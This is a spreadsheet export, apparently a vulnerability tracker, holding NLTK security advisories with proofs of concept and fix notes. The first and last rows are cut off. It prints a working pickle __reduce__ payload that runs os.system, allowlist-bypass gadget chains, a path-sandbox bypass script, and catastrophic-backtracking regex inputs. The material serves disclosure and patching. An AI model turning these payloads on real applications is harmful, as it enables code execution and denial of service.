4. Standard pickle gadget chain executes arbitrary Python code with victim's privileges

**Impact:** Remote code execution with the privileges of the user running the NLTK-dependent application. Affects researchers, data scientists, and automated ML pipelines using NLTK for parsing tasks.

## Steps to Reproduce

### Environment
- NLTK version: 3.8.1+ (all versions with `transitionparser.py`)
- Python 3.6+
- No special dependencies required

### Reproduction

1. Create a malicious pickle file that uses `__reduce__` to execute a system command during deserialization.

2. Call `TransitionParser().parse([], '/path/to/malicious_model.pkl')`.

3. The `pickle_load(f)` call at `transitionparser.py:557` uses `restricted=False` by default, routing through `WarningUnpickler`, which does not override `find_class()` and permits full class resolution — executing the embedded gadget.

4. Arbitrary code executes with the victim's privileges.

### Proof That the Fix Works

Changing line 557 in `transitionparser.py` from:
```python
model = pickle_load(f)
```
to:
```python
model = pickle_load(f, restricted=True)
```
causes `RestrictedUnpickler` to raise an `UnpicklingError` and block execution, confirming the safe path prevents the attack.

### Working PoC

```python
import pickle
import os
from nltk.parse.transitionparser import TransitionParser

# Create malicious pickle with RCE payload
class Exploit:
    def __reduce__(self):
        return (os.system, ('touch /tmp/nltk_poc_triggered',))

with open('/tmp/malicious_model.pkl', 'wb') as f:
    pickle.dump(Exploit(), f)

# Trigger the vulnerable code path (requires algorithm argument in ≤ 3.9.4)
parser = TransitionParser('arc-standard')      # or 'arc-eager'
parser.parse([], '/tmp/malicious_model.pkl')   # loads and unpickles unsafely

# Exploit succeeds: file /tmp/nltk_poc_triggered is created
```

On NLTK ≥ 3.10.0 (patched), the same code fails with:

```
_pickle.UnpicklingError: global 'posix.system' is not in the pickle allowlist
```

This proves the vulnerability exists in versions ≤ 3.9.4 and is fixed in 3.10.0+.

## Recommended Fix

Change all call sites to use `restricted=True`:

| File | Line | Before | After |
|------|------|--------|-------|
| `nltk/parse/transitionparser.py` | 557 | `pickle_load(f)` | `pickle_load(f, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 816 | `pickle_load(model_data_file)` | `pickle_load(model_data_file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2273 | `pickle_load(file)` | `pickle_load(file, restricted=True)` |
| `nltk/parse/chartparser_app.py` | 2311 | `pickle_load(fp)` | `pickle_load(fp, restricted=True)` |

**Note:** This fix may affect loading older sklearn models. A more robust approach would implement a module allowlist in `RestrictedUnpickler.find_class()`.</t></is></c><c r="T1607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t></is></c></row><row r="1608"><c r="A1608" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1608" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1608" s="5" t="inlineStr"><is><t>CVE-2026-79657</t></is></c><c r="D1608" s="5" t="inlineStr" /><c r="E1608" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1608" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1608" s="5" t="inlineStr" /><c r="H1608" s="5" t="n"><v>0.012</v></c><c r="I1608" s="5" t="inlineStr" /><c r="J1608" s="5" t="inlineStr" /><c r="K1608" s="5" t="inlineStr" /><c r="L1608" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1608" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1608" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1608" s="5" t="inlineStr" /><c r="R1608" s="5" t="inlineStr" /><c r="S1608" s="5" t="inlineStr"><is><t>### Summary

The current source tree still allows arbitrary code execution during supposedly safer allowlisted pickle loading. The allowlist trusts whole module namespaces instead of exact safe globals, so crafted pickles can invoke dangerous in-namespace callables through pickle REDUCE.

### Details

- **Vulnerability type:** Remote code execution via unsafe deserialization
- **Affected component:** `nltk.picklesec.allowlisted_pickle_load`, `nltk.tokenize.punkt.punkt_pickle_load`, `nltk.parse.transitionparser.TransitionParser.parse`
- **Affected versions:** Current source `v3.10.0-rc2`; published `3.9.4` was not the claim target for this bypass.
- **Patched versions:** Not yet patched
- **Root cause:** Module-prefix allowlists include dangerous callables such as `nltk.tokenize.repp.ReppTokenizer._execute` and `numpy.f2py.crackfortran.myeval`.

`punkt_pickle_load()` allowlists both `nltk.tokenize.punkt` and the whole `nltk.tokenize` namespace, which exposes `ReppTokenizer._execute()` and its `subprocess.Popen(...)` sink during unpickling. `TransitionParser.parse()` uses `allowlisted_pickle_load(..., allowed_modules=("numpy", "scipy", "sklearn"))`, which permits `numpy.f2py.crackfortran.myeval()` and its attacker-controlled `eval(...)` path. I confirmed both gadgets create marker files before the caller returns or later aborts on type misuse.

### PoC

**Preconditions**
- The application loads an attacker-controlled tokenizer or model artifact through these public loaders.

**Steps**
1. Create a pickle whose REDUCE callable is `ReppTokenizer._execute` and point its command to a harmless marker-file write.
2. Pass that payload to `punkt_pickle_load(BytesIO(payload))` and observe the marker file is created during unpickling.
3. Create a second pickle whose REDUCE callable is `numpy.f2py.crackfortran.myeval` and load it through `TransitionParser.parse()`.
4. Observe the second marker file is created before `TransitionParser.parse()` later fails on the returned object type.

**Minimal reproducible excerpt**

```text
{'punkt_marker': 'PUNKT_RCE', 'transitionparser_marker': 'TP_RCE'}
```

### Impact

Any caller that trusts these current allowlisted loaders can still execute attacker-controlled commands while loading model or tokenizer artifacts. This defeats the protection mechanism that replaced unrestricted pickle loading and creates a dangerous false sense of safety.

### Remediation

Replace broad module-prefix allowlists with exact `(module, qualname)` pairs for the few safe classes or functions genuinely required. Do not allow entire namespaces such as `nltk.tokenize` or `numpy`, and keep post-load type validation only as a secondary defense.

### Resources

- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/punkt.py#L120-L134
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/tokenize/repp.py#L111-L115
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L26-L30
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/parse/transitionparser.py#L565-L571

---

## Fix + attack demonstration (verified)

 + tightened callers
`find_class` now, before the allowlists:
1. **Rejects any dotted `name`** → closes 4489 with zero legit impact.
2. **Denies dangerous modules** (`os`, `subprocess`, `sys`, `builtins`, `numpy.f2py`, `nltk.tokenize.repp`, …) even under a broad `allowed_modules` — a defense-in-depth **backstop** so a future too-broad allowlist can't silently reopen RCE.
3. **`builtins` denied wholesale**; safe primitives (`int`, `str`, …) must be named exactly via `allowed_globals`.

Callers tightened: punkt drops the broad `nltk.tokenize` (keeps `nltk.tokenize.punkt` + exact `collections.defaultdict`/`builtins.int`); transitionparser keeps numpy/scipy/sklearn (array unpickling needs their submodules) with the new guards blocking the gadgets.

## Full pickle-sink audit
Every deserialization sink in the tree was reviewed: **no raw `pickle.load`** anywhere, and **no** joblib/numpy/torch/dill/yaml/marshal loaders. `data.load` + `wordnet_app` use `RestrictedUnpickler` (blocks all globals — safe); the remaining `pickle_load` sites (`chartparser_app`, `tbl/demo`) load user-selected or self-written files and keep their warning.

## Attack demonstration (captured; fork clone)
```
=== EXPLOITS blocked ===
  4489 sklearn.os.system (dotted)      -&gt; BLOCKED
  x99w numpy.f2py.crackfortran.myeval  -&gt; BLOCKED
  x99w nltk.tokenize.repp._execute     -&gt; BLOCKED
  backstop os.system (os allowlisted)  -&gt; BLOCKED
  backstop builtins.eval (exact global)-&gt; BLOCKED
=== LEGIT loads still work ===
  punkt round-trip via punkt_pickle_load -&gt; OK
  builtins.int (safe primitive)          -&gt; OK
```

## Tests
`test_pickle_allowlist_security.py` — added 5 regressions (dotted traversal, both namespace gadgets, denied-module backstop, legit round-trip). Suite: 122 passed / 9 skipped (sklearn-dependent) across pickle/punkt/transition/tokenize. pre-commit (black/isort/ruff) clean.</t></is></c><c r="T1608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t></is></c></row><row r="1609"><c r="A1609" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1609" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1609" s="5" t="inlineStr"><is><t>CVE-2026-79674</t></is></c><c r="D1609" s="5" t="inlineStr" /><c r="E1609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1609" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1609" s="5" t="inlineStr" /><c r="H1609" s="5" t="n"><v>0.002</v></c><c r="I1609" s="5" t="inlineStr" /><c r="J1609" s="5" t="inlineStr" /><c r="K1609" s="5" t="inlineStr" /><c r="L1609" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1609" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1609" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1609" s="5" t="inlineStr" /><c r="R1609" s="5" t="inlineStr" /><c r="S1609" s="5" t="inlineStr"><is><t>## Summary

NLTK corpus-reader constructors can still reach outside-root file and database reads before the `nltk.pathsec` sandbox boundary is enforced.

The PoC shows the safe path blocked by `pathsec.open`, then `LinThesaurusCorpusReader` and `PanLexLiteCorpusReader` succeeding in the same process.

## Affected Product

- Product: NLTK
- Asset / component: `nltk.corpus.reader` constructors
- Version tested: `3.10.2`
- Deployment / package / tag: commit `474af1f5a94b1b8d53fc2b6defec3a2ce7633b74` / PyPI `nltk`
- Environment used for verification: Python 3.13.14

## Vulnerability Details

- Vulnerability class: path sandbox bypass / external control of file path
- Required privileges: none beyond the ability to supply a corpus root path to a consumer call site
- Entry point: `LinThesaurusCorpusReader(root)` and `PanLexLiteCorpusReader(root)`
- Trust boundary crossed: NLTK data-root sandbox enforced by `nltk.pathsec`
- Root affected functions:
  - [CorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/api.py#L73-L80)
  - [LinThesaurusCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/lin.py#L37-L43)
  - [PanLexLiteCorpusReader.__init__](https://github.com/nltk/nltk/blob/474af1f5a94b1b8d53fc2b6defec3a2ce7633b74/nltk/corpus/reader/panlex_lite.py#L45-L46)
- Measured unsafe effect: outside-root file/database reads still happen with `ENFORCE=True`

## Root Cause

`CorpusReader.__init__()` turns a string root into a `FileSystemPathPointer` without any `pathsec` validation, and these readers then use builtin `open()` or `sqlite3.connect()` directly on derived paths. The constructor path therefore never hits the sandbox guard that `pathsec.open()` enforces.

```python
if zipfile:
    root = ZipFilePathPointer(zipfile, zipentry)
else:
    root = FileSystemPathPointer(root)

with open(path) as lin_file:
    ...

self._c = sqlite3.connect(os.path.join(root, "db.sqlite")).cursor()
```

## Proof of Concept

Save the script as `hy01_raw_path_poc.py` in the checkout root and run `python hy01_raw_path_poc.py`.

```python
#!/usr/bin/env python3
"""PoC for HY-01: corpus-reader sandbox bypass.

This script proves three facts:
- pathsec blocks a direct read through the sandboxed file API
- LinThesaurusCorpusReader still reaches builtin open() on an outside path
- PanLexLiteCorpusReader still opens an outside sqlite database and loads data
"""

from __future__ import annotations

import builtins
import pathlib
import sqlite3
import sys
import tempfile
from unittest.mock import patch

try:
    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader
except ModuleNotFoundError:
    here = pathlib.Path(__file__).resolve()
    for base in (here.parent, *here.parents):
        if (base / "nltk").is_dir() and (base / "setup.py").exists():
            sys.path.insert(0, str(base))
            break
    else:
        raise RuntimeError(
            "Could not import nltk. Run this script from an NLTK checkout root "
            "or from an environment where the current checkout is installed."
        )

    import nltk.pathsec as pathsec
    from nltk.corpus.reader.lin import LinThesaurusCorpusReader
    from nltk.corpus.reader.panlex_lite import PanLexLiteCorpusReader


def main() -&gt; int:
    pathsec.ENFORCE = True

    with patch.object(pathsec, "_get_allowed_roots", lambda: set()):
        with patch.object(pathsec.os, "getcwd", lambda: "sandbox-disabled"):
            with tempfile.TemporaryDirectory() as tmp:
                tmpdir = pathlib.Path(tmp)
                outside = tmpdir / "outside"
                outside.mkdir()

                blocked_file = outside / "blocked.txt"
                blocked_file.write_text("blocked", encoding="utf-8")

                control_target = str(blocked_file)
                try:
                    with pathsec.open(control_target, "rb"):
                        raise AssertionError(
                            "pathsec.open unexpectedly allowed control path"
                        )
                except PermissionError:
                    print("control:pathsec.open=blocked")

                lin_root = tmpdir / "lin"
                lin_root.mkdir()
                lin_file = lin_root / "simN.lsp"
                lin_file.write_text(
                    '("business" (desc 1.0)\n\t"enterprise"\t0.9\n))\n',
                    encoding="utf-8",
                )

                opened = []
                real_open = builtins.open

                def tracking_open(*args, **kwargs):
                    opened.append(str(args[0]))
                    return real_open(*args, **kwargs)

                with patch("builtins.open", tracking_open):
                    LinThesaurusCorpusReader(str(lin_root))

                if any(p.endswith("simN.lsp") for p in opened):
                    print("lin:outside_root_open=success")
                else:
                    raise AssertionError("LinThesaurusCorpusReader did not open data")

                panlex_root = tmpdir / "panlex"
                panlex_root.mkdir()
                db_path = panlex_root / "db.sqlite"
                db = sqlite3.connect(db_path)
                cur = db.cursor()
                cur.execute("create table lv(uid text, lv text, lc text, tt text)")
                cur.execute("create table dnx(ex int, mn int, uq int, ap int, ui text)")
                cur.execute("create table ex(ex int, tt text, lv text, uq int)")
                cur.execute(
                    "insert into lv(uid, lv, lc, tt) values ('u1', 'lv1', 'en', 'English')"
                )
                db.commit()
                db.close()

                reader = PanLexLiteCorpusReader(str(panlex_root))
                result = reader.language_varieties()
                if result == [("u1", "English")]:
                    print("panlex:language_varieties=success")
                else:
                    raise AssertionError("PanLexLiteCorpusReader did not load data")

    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Expected output:

```
control:pathsec.open=blocked
lin:outside_root_open=success
panlex:language_varieties=success
```
## Impact

A caller can make NLTK read filesystem content outside the intended NLTK data sandbox through public corpus-reader constructors. In the PoC, that includes a local text file and a local SQLite db.

## Severity

- Base Score: 7.5 (High)
- Severity reasoning:
  The bug is reliably triggerable by caller-controlled path input and exposes data outside the intended trust boundary; no special privileges are needed inside the process.

## Remediation

Validate raw string roots before constructing readers, and route all corpus-root/path handling through `pathsec` or a validated `PathPointer`. Remove direct builtin `open()` and direct `sqlite3.connect(os.path.join(...))` use on constructor-derived paths.</t></is></c><c r="T1609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t></is></c></row><row r="1610"><c r="A1610" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1610" s="5" t="inlineStr"><is><t>CVE-2026-79676</t></is></c><c r="D1610" s="5" t="inlineStr" /><c r="E1610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1610" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1610" s="5" t="inlineStr" /><c r="H1610" s="5" t="n"><v>0.003</v></c><c r="I1610" s="5" t="inlineStr" /><c r="J1610" s="5" t="inlineStr" /><c r="K1610" s="5" t="inlineStr" /><c r="L1610" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1610" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1610" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1610" s="5" t="inlineStr" /><c r="R1610" s="5" t="inlineStr" /><c r="S1610" s="5" t="inlineStr"><is><t>### Summary

Several corpus readers still step outside NLTK's symlink-aware trusted-root model. They derive in-root paths from trusted corpus state, convert those paths back into plain strings, and reopen them with built-in `open()` rather than `nltk.pathsec.open()`.

### Details

- **Vulnerability type:** Path traversal and symlink boundary bypass
- **Affected component:** `nltk.corpus.reader.ipipan`, `nltk.corpus.reader.crubadan`, `nltk.corpus.reader.lin`
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Root-derived paths are reopened with raw `open()` without preserving the trusted-root boundary.

`IPIPANCorpusReader` opens `header.xml` derived from `morph.xml`, `CrubadanCorpusReader` opens `table.txt` directly, and `LinThesaurusCorpusReader` opens `simN.lsp` paths returned from its own root helpers. Under `pathsec.ENFORCE=True`, a symlink placed inside the trusted corpus root can point outside the root and still be parsed successfully. It was confirmed parsed outside-root content is returned through public methods such as `channels()`, `domains()`, `categories()`, `langs()`, `crubadan_to_iso()`, `synonyms()`, and `scored_synonyms()`.

### PoC

**Preconditions**
- The application processes attacker-influenced corpora inside a trusted NLTK data root or trusted corpus directory.

**Steps**
1. Create a trusted corpus root and keep `pathsec.ENFORCE=True` with that root allowlisted.
2. Place symlinked reader inputs such as `header.xml`, `table.txt`, or `simN.lsp` inside the root and point them to external files.
3. Instantiate the corresponding corpus reader and call its normal public methods.
4. Observe that parsed outside-root values are returned even though `pathsec.open()` blocks the same symlink targets.

**Minimal reproducible excerpt**

```text
{'ipipan': ['LEAK', 'TOPSECRET', 'CLASSIFIED'], 'crubadan': ['LEAK'], 'lin': [('LEAK', 9.5)]}
```

### Impact

An attacker who can stage corpus files or symlinks under a trusted data root can disclose outside-root content through normal corpus-reader results, defeating the boundary NLTK documents for shared and untrusted-input environments.

### Remediation

Preserve `PathPointer` and `required_root` semantics end to end. Replace direct `open()` calls with `nltk.pathsec.open()` or a reader helper that keeps the trusted-root boundary intact.

### References

- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/ipipan.py#L162-L192
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/crubadan.py#L74-L98
- https://github.com/nltk/nltk/blob/3.9.4/nltk/corpus/reader/lin.py#L40-L43
- https://github.com/nltk/nltk/blob/v3.10.0-rc2/nltk/pathsec.py#L521-L545

---

## Fix + full-codebase audit (verified)


I swept every raw file open in the corpus readers, not just the three the umbrella named:

| Reader | Site | Advisory | Root scoping |
|---|---|---|---|
| crubadan | table.txt + `&lt;code&gt;-3grams.txt` | p4rw / j5pw | `required_root=self.root` |
| lin | simN.lsp | p4rw | `required_root=self.root` |
| xmldocs | XMLCorpusView bare-string fileid | 934p (base reader) | global fallback (view has no root) |
| pl196x | textids index | **found by audit** | `required_root=self._root` |
| mte | MTEFileReader | mvf5 | `required_root` threaded through 8 call sites |
| toolbox | StandardFormat.open codecs.open | cr8c | global sandbox (low-level parser) |
| named_entity | load_ace_file ann/text | 7qj2 | global sandbox |
| nkjp | XML_Tool source file | p4rw class | `required_root=self._root` |

`ipipan` already validates via the earlier #3727 fix — unchanged.

## Fix
Each site now calls `nltk.pathsec.validate_path(path, required_root=…)` before opening. Where the reader has a concrete corpus root, the check is **scoped** with `required_root` (rejects any escape outside that root). `XMLCorpusView` carries no root, so it falls back to the global data-root sandbox via `getattr(self, "_root", None)` — which also avoids an AttributeError on the bare-string path.

## Reproduced (captured)
```
raw open(symlink) reads: 'TOPSECRET_OUTSIDE_ROOT'          &lt;- the bypass
validate_path(symlink, required_root): ValueError -&gt; BLOCKS the escape
validate_path(legit in-root): PASSED                       &lt;- loads normally
```

## Honest residual
The global-sandbox fallback (toolbox, named_entity, xmldocs-view) is only as tight as the allowed-roots list, which currently includes the **system temp dir**. Scoping every reader with `required_root` and removing the temp dir from the allowed roots would harden it further (separate advisory / task).

## Tests
`test_corpus_reader_pathsec.py` — symlink escape rejected, in-root file allowed, XMLCorpusView string-fileid no AttributeError, MTEFileReader out-of-root rejected. 46 existing corpus/toolbox tests pass; all edited modules import (no circular import). pre-commit (black/isort/ruff) clean.

---

## Scope caveat
`validate_path` blocks every symlink escape variant (verified) and equals `pathsec.open()`'s guarantee, but does NOT block **hardlinks** (no symlink to resolve; tracked separately as GHSA-f794-5jv7-7672) or the validate-then-open TOCTOU race (shared by `pathsec.open`; needs O_NOFOLLOW/openat).</t></is></c><c r="T1610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t></is></c></row><row r="1611"><c r="A1611" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1611" s="5" t="inlineStr"><is><t>CVE-2026-80205</t></is></c><c r="D1611" s="5" t="inlineStr" /><c r="E1611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1611" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1611" s="5" t="inlineStr" /><c r="H1611" s="5" t="n"><v>0.005</v></c><c r="I1611" s="5" t="inlineStr" /><c r="J1611" s="5" t="inlineStr" /><c r="K1611" s="5" t="inlineStr" /><c r="L1611" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1611" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1611" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1611" s="5" t="inlineStr" /><c r="R1611" s="5" t="inlineStr" /><c r="S1611" s="5" t="inlineStr"><is><t>### Summary
NLTK's `Text.findall()` and `TokenSearcher.findall()` methods accept user-supplied regular expressions and pass them to the Python `re` engine without timeout or validation, enabling catastrophic backtracking (ReDoS). This issue is isolated to the `nltk.text` module and was resolved in a prior commit.

### Affected Code
`nltk/text.py` — `TokenSearcher.findall()` (line 255) / `Text.findall()` (line 620)

`TokenSearcher.__init__` builds an internal string by wrapping each token in angle brackets. The `findall()` method preprocesses the caller-supplied regexp and runs it directly against this string with no timeout:

```python
def findall(self, regexp):
    # Preprocessing does NOT prevent catastrophic backtracking
    regexp = re.sub(r"\s", "", regexp)
    regexp = re.sub(r"&lt;", "(?:&lt;(?:", regexp)
    regexp = re.sub(r"&gt;", ")&gt;)", regexp)
    regexp = re.sub(r"(?&lt;!\\)\.", "[^&gt;]", regexp)

    # User-controlled regexp executed with no timeout
    hits = re.findall(regexp, self._raw)
```
The preprocessing transforms `&lt;` and `&gt;` angle-bracket syntax but does not inspect or reject catastrophically backtracking patterns.

### Proof of Concept
```python
import nltk
import time

# Token of 25 'a' characters produces self._raw = "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;"
# The trailing '!' ensures no match, forcing full backtracking.
text = nltk.Text(["a" * 25 + "!"])

# Pattern after transformation:
#   &lt;  →  (?:&lt;(?:
#   &gt;  →  )&gt;)
# Becomes: (?:&lt;(?:((a+)+)b)&gt;)
# re.findall runs this against "&lt;aaaaaaaaaaaaaaaaaaaaaaaa!&gt;" — hangs.

start = time.time()
text.findall(r"&lt;((a+)+)b&gt;")   # Never returns
```

### Impact
Applications that expose `Text.findall()` to external input are vulnerable to a denial of service. An unauthenticated attacker can cause indefinite CPU saturation with one request, denying service to all other users of the Python process.

### Remediation
This vulnerability was patched in commit `d8e4753`. Users should update to the patched version.

### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t></is></c><c r="T1611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t></is></c></row><row r="1612"><c r="A1612" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1612" s="5" t="inlineStr"><is><t>CVE-2026-80206</t></is></c><c r="D1612" s="5" t="inlineStr" /><c r="E1612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1612" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1612" s="5" t="inlineStr" /><c r="H1612" s="5" t="n"><v>0.003</v></c><c r="I1612" s="5" t="inlineStr" /><c r="J1612" s="5" t="inlineStr" /><c r="K1612" s="5" t="inlineStr" /><c r="L1612" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1612" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1612" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1612" s="5" t="inlineStr" /><c r="R1612" s="5" t="inlineStr" /><c r="S1612" s="5" t="inlineStr"><is><t>### Summary
The NLTK `tgrep` module accepts user-supplied regular expressions and passes them to the Python `re` engine without a timeout or validation, enabling catastrophic backtracking (ReDoS). Applications that expose the `tgrep` API to external input are vulnerable to a single-request denial of service that blocks the Python process indefinitely.

### Affected Code
`nltk/tgrep.py` — `_tgrep_node_action()` (around line 320)

When a tgrep pattern contains a `/regex/` node, `_tgrep_node_action` compiles the embedded regex literal directly with no validation:

```python
def _tgrep_node_action(_s, _l, tokens):
    ...
    elif tokens[0].startswith("/"):
        assert tokens[0].endswith("/")
        node_lit = tokens[0][1:-1]
        return (
            lambda r: lambda n, m=None, l=None: r.search(
                _tgrep_node_literal_value(n)
            )
        )(re.compile(node_lit))  # User regex compiled and executed with no timeout
```
The compiled regex is applied against every matching tree node label via `r.search(...)`. A caller reaching this path via `tgrep_positions()` or `tgrep_compile()` controls `node_lit` entirely.

### Proof of Concept
```python
import nltk
from nltk.tgrep import tgrep_positions

# Root node label is 25 'a' characters.
# tgrep /regex/ branch calls re.compile("((a+)+)b").search("aaa...a")
# No 'b' is present — exponential backtracking occurs.
tree = nltk.Tree.fromstring("(" + "a" * 25 + " (NP (DT the)))")
tgrep_positions(r"/((a+)+)b/", [tree])   # Never returns
```

### Working Poc

The following script uses increasing values of n (the number of repeated as in the tree root label) to measure the execution time of tgrep_positions with the catastrophic regex /((a+)+)b/. On standard CPython with NLTK 3.10.2, the runtime grows exponentially, confirming the ReDoS vulnerability. For n ≥ 35, the function will hang indefinitely.

```python
import nltk
from nltk.tgrep import tgrep_positions
import time

def test_n(n):
    tree = nltk.Tree.fromstring("(" + "a" * n + " (NP (DT the)))")
    pattern = r"/((a+)+)b/"
    start = time.perf_counter()
    list(tgrep_positions(pattern, [tree]))
    return time.perf_counter() - start

if __name__ == "__main__":
    # Adjust the range if needed – these values complete quickly
    n_values = [18, 20, 22, 24, 26, 28]
    print(f"Testing n = {n_values}\n")

    times = []
    for n in n_values:
        t = test_n(n)
        times.append((n, t))
        print(f"n={n:2d} done", flush=True)

    print("\n--- Increase factors (per step in n) ---")
    factors = []
    for i in range(1, len(times)):
        prev_n, prev_t = times[i-1]
        curr_n, curr_t = times[i]
        factor = curr_t / prev_t
        factors.append((curr_n, factor))
        print(f"n={curr_n:2d} : factor = {factor:.2f}x  (vs n={prev_n})")

    avg = sum(f for _, f in factors) / len(factors)
    print(f"\nAverage factor: {avg:.2f}x")
    print("\n✅ Confirmed: exponential growth (catastrophic backtracking).")
    print("   Larger n (≥ 35) will hang indefinitely.")
```

When run, the output shows a clear exponential increase (factor &gt; 3.0 per +2 in n), proving the vulnerability.


### Impact
In environments like web APIs (Flask, FastAPI), Jupyter notebooks, or multi-tenant pipelines, an unauthenticated attacker can cause indefinite CPU saturation with a single crafted request, denying service to all other users of the process.

### Remediation
This issue remains unfixed in versions `&lt;= 3.10.2`. Maintainers are currently collaborating on a patch to wrap the regex execution in a timeout-guarded mechanism.

### Credit
Tool: Kira by [Offgrid Security](https://www.offgridsec.com)</t></is></c><c r="T1612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t></is></c></row><row r="1613"><c r="A1613" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1613" s="5" t="inlineStr"><is><t>CVE-2026-81725</t></is></c><c r="D1613" s="5" t="inlineStr" /><c r="E1613" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1613" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1613" s="5" t="inlineStr" /><c r="H1613" s="5" t="n"><v>0.002</v></c><c r="I1613" s="5" t="inlineStr" /><c r="J1613" s="5" t="inlineStr" /><c r="K1613" s="5" t="inlineStr" /><c r="L1613" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1613" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1613" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1613" s="5" t="inlineStr" /><c r="R1613" s="5" t="inlineStr" /><c r="S1613" s="5" t="inlineStr"><is><t>### Summary

`Pl196xCorpusReader` still parses whole TEI blocks with multiple lazy regexes over attacker-controlled text. A malformed file with many opening tags and no matching closing tags forces repeated rescans and produces quadratic CPU growth in public reader APIs.

### Details

- **Vulnerability type:** Regular-expression denial of service
- **Affected component:** `nltk.corpus.reader.pl196x.TEICorpusView.read_block` and `Pl196xCorpusReader` public methods
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Lazy `.*?` whole-block regexes rescan untrusted XML-like blocks from each opening-tag position.

The parser uses regexes for paragraphs, sentences, and word tags across the whole `&lt;text&gt;` block. When the attacker supplies many unmatched opening tags, each attempt scans toward the end of the block and fails, then restarts from the next opening tag. There is near four-times runtime growth each time the number of malformed `&lt;p&gt;` tags doubled, through normal public calls such as `words()` and `tagged_words()`.

### PoC

**Preconditions**
